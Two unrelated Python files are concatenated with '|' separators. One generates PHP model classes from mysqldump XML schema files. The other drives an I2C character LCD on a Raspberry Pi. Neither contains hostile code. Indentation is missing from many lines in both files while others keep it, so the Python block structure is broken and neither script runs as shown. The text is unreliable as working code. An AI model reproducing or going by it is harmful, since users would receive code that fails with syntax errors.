import sys
import xml.etree.ElementTree as ET
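# Generates PHP model classes (public properties, an ORM converter and a
# __toString method) from XML table definitions, in the format produced by
# e.g. `mysqldump --xml`.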
def generate_converter_method(table):
buff = []
table_name = table.attrib["name"]
buff.append(
" public function to"
+ to_pascal_case(table_name)
+ "(ORM $item) : "
+ to_pascal_case(table_name)
+ " {"
)
buff.append(
" $"
+ to_camel_case(table_name)
+ " = new "
+ to_pascal_case(table_name)
+ "();"
)
for field in table.findall("./field"):
field_name = field.attrib["Field"]
buff.append(
" $"
+ to_camel_case(table_name)
+ "->"
+ to_camel_case(field_name)
+ " = $item->"
+ field_name
+ ";"
)
buff.append(" return $" + to_camel_case(table_name) + ";")
buff.append(" }")
return buff
def generate_tostring_method(table):
buff = []
buff.append(" public function __toString() {")
buff.append(" $result = [];")
for field in table.findall("./field"):
field_name = field.attrib["Field"]
buff.append(
" $result[] = '"
+ to_camel_case(field_name)
+ ":[' . $this->"
+ to_camel_case(field_name)
+ " . ']"
+ "';"
)
buff.append(" return implode(',', $result);")
buff.append(" }")
return buff
def generate_model_class(filename):
buff = []
tree = ET.parse(filename)
root = tree.getroot()
for table in root.findall("./database/table_structure"):
table_name = table.attrib["name"]
buff.append("class " + to_pascal_case(table_name) + " {")
# generate properties.
for field in table.findall("./field"):
field_comment = field.attrib["Comment"]
field_name = field.attrib["Field"]
buff.append(" // " + field_comment)
buff.append(" public $" + to_camel_case(field_name) + ";")
buff.append("")
# generate converter.
method = generate_converter_method(table)
buff.append("\n".join(method))
buff.append("")
tostring = generate_tostring_method(table)
buff.append("\n".join(tostring))
buff.append("}")
return buff
def to_pascal_case(snake_str):
components = snake_str.split("_")
return "".join(x.title() for x in components)
def to_camel_case(snake_str):
components = snake_str.split("_")
return components[0] + "".join(x.title() for x in components[1:])
if __name__ == "__main__":
args = sys.argv
    if len(args) == 2:
filename = args[1]
buff = generate_model_class(filename)
print("\n".join(buff))
else:
print("Usage: python gen_model.py [filename.xml]")
|
import smbus
from time import sleep
# Class to simplify I2C access (write-only)
class i2c_device:
    # constructor
    def __init__(self, addr):
        # save the address
        self.addr = addr
        # select the I2C bus according to the Raspberry Pi revision
        # (the first board revisions, 0002 and 0003, expose I2C on bus 0)
        self.revision = ([l.split(':')[1].strip() for l in open('/proc/cpuinfo', 'r').readlines()
                          if l.startswith('Revision')] + ['0000'])[0]
        self.bus = smbus.SMBus(0 if self.revision in ('0002', '0003') else 1)
    # write a byte
    def write(self, byte):
        self.bus.write_byte(self.addr, byte)
# Class to access the LCD
class lcd_pcf8574:
    # constructor
    def __init__(self, addr=0x27, bitRS=0, bitRW=1, bitE=2, bitBL=3, bitD4=4, bitD5=5, bitD6=6, bitD7=7):
        # save the configuration
        self.mskRS = 1 << bitRS
        self.mskRW = 1 << bitRW
        self.mskE = 1 << bitE
        self.mskBL = 1 << bitBL
        self.mskD4 = 1 << bitD4
        self.mskD5 = 1 << bitD5
        self.mskD6 = 1 << bitD6
        self.mskD7 = 1 << bitD7
        # start access to the PCF8574 (use the addr parameter, not a fixed address)
        self.lcd_device = i2c_device(addr)
        self.valorAtual = 0x00
        self.lcd_device.write(self.valorAtual)
        # constants
self.LOW = 0
self.HIGH = 1
self.CMD = self.LOW
self.DADO = self.HIGH
self.CMD_CLS = 0x01
self.CMD_DISPON = 0x0C
self.CMD_POSCUR = 0x80
self.CMD_FUNCTIONSET = 0x20
self.LCD_4BITMODE = 0x00
self.LCD_2LINE = 0x08
self.LCD_5x8DOTS = 0x00
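        # (per the HD44780 instruction set: CMD_CLS clears the display,
        # CMD_DISPON turns it on with the cursor off, CMD_POSCUR sets the
        # DDRAM address, CMD_FUNCTIONSET selects bus width, line count and font)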
    # control the RS (register select) signal
def setRS(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskRS
else:
self.valorAtual = self.valorAtual | self.mskRS
self.lcd_device.write(self.valorAtual)
    # control the RW (read/write) signal
def setRW(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskRW
else:
self.valorAtual = self.valorAtual | self.mskRW
self.lcd_device.write(self.valorAtual)
    # control the E (enable) signal
def setE(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskE
else:
self.valorAtual = self.valorAtual | self.mskE
self.lcd_device.write(self.valorAtual)
    # control the backlight
def setBL(self, valor):
if valor == self.LOW:
self.valorAtual = self.valorAtual & ~self.mskBL
else:
self.valorAtual = self.valorAtual | self.mskBL
self.lcd_device.write(self.valorAtual)
    # control the data pins (D4 to D7)
def setDado(self, nib):
self.valorAtual = self.valorAtual & ~(self.mskD4 | self.mskD5 | self.mskD6 | self.mskD7)
if (nib & 8) != 0:
self.valorAtual = self.valorAtual | self.mskD7
if (nib & 4) != 0:
self.valorAtual = self.valorAtual | self.mskD6
if (nib & 2) != 0:
self.valorAtual = self.valorAtual | self.mskD5
if (nib & 1) != 0:
self.valorAtual = self.valorAtual | self.mskD4
self.lcd_device.write(self.valorAtual)
    # send a byte to the display in 4-bit mode: high nibble first, then low
    # nibble, latching each one with a pulse on E
    def writeByte(self, rs, dado):
        self.setRS(rs)
        self.setE(self.HIGH)
        self.setDado(dado >> 4)
        self.setE(self.LOW)
        self.setE(self.HIGH)
        self.setDado(dado)
        self.setE(self.LOW)
    # send a command to the display
    def writeCmd(self, cmd):
        self.writeByte(self.CMD, cmd)
    # send a character to the display
    def writeChar(self, ch):
        self.writeByte(self.DADO, ch)
    # initialize the display
    def init(self):
        # wait in case power has just been applied
        sleep(0.1)
        # we only ever write to the display
        self.setRW(self.LOW)
        # classic HD44780 reset-by-instruction sequence to guarantee 4-bit mode
self.writeCmd(0x03)
sleep(0.005)
self.writeCmd(0x03)
sleep(0.001)
self.writeCmd(0x03)
sleep(0.001)
self.writeCmd(0x02)
sleep(0.001)
        # configure the display
        self.writeCmd(self.CMD_FUNCTIONSET | self.LCD_4BITMODE | self.LCD_2LINE | self.LCD_5x8DOTS)
        sleep(0.001)
        # clear the screen and turn the display on
self.writeCmd(self.CMD_CLS)
sleep(0.002)
self.writeCmd(self.CMD_DISPON)
    # turn the backlight on
def backlightOn(self):
self.setBL(self.HIGH)
    # turn the backlight off
def backlightOff(self):
self.setBL(self.LOW)
    # clear the screen
def clear(self):
self.writeCmd(self.CMD_CLS)
sleep(0.002)
    # write text to the display at line `lin` (0 or 1) and column `col`
    def displayWrite(self, lin, col, texto):
        # line 1 starts at DDRAM address 0x40
        ender = col
        if lin == 1:
            ender = ender + 0x40
        self.writeCmd(self.CMD_POSCUR + ender)
        for ch in texto:
            self.writeChar(ord(ch))
# Simple test
if __name__ == "__main__":
lcd = lcd_pcf8574()
lcd.init()
lcd.backlightOn()
lcd.displayWrite(0, 0, "DQSoft")
lcd.displayWrite(1, 0, "Display I2C")
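    # Hypothetical extension of the demo: blink the backlight a few times to
    # exercise setBL (assumes the default 0x27 address; adjust addr if needed,
    # e.g. after checking with `i2cdetect -y 1` from i2c-tools)
    for _ in range(3):
        sleep(0.5)
        lcd.backlightOff()
        sleep(0.5)
        lcd.backlightOn()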
|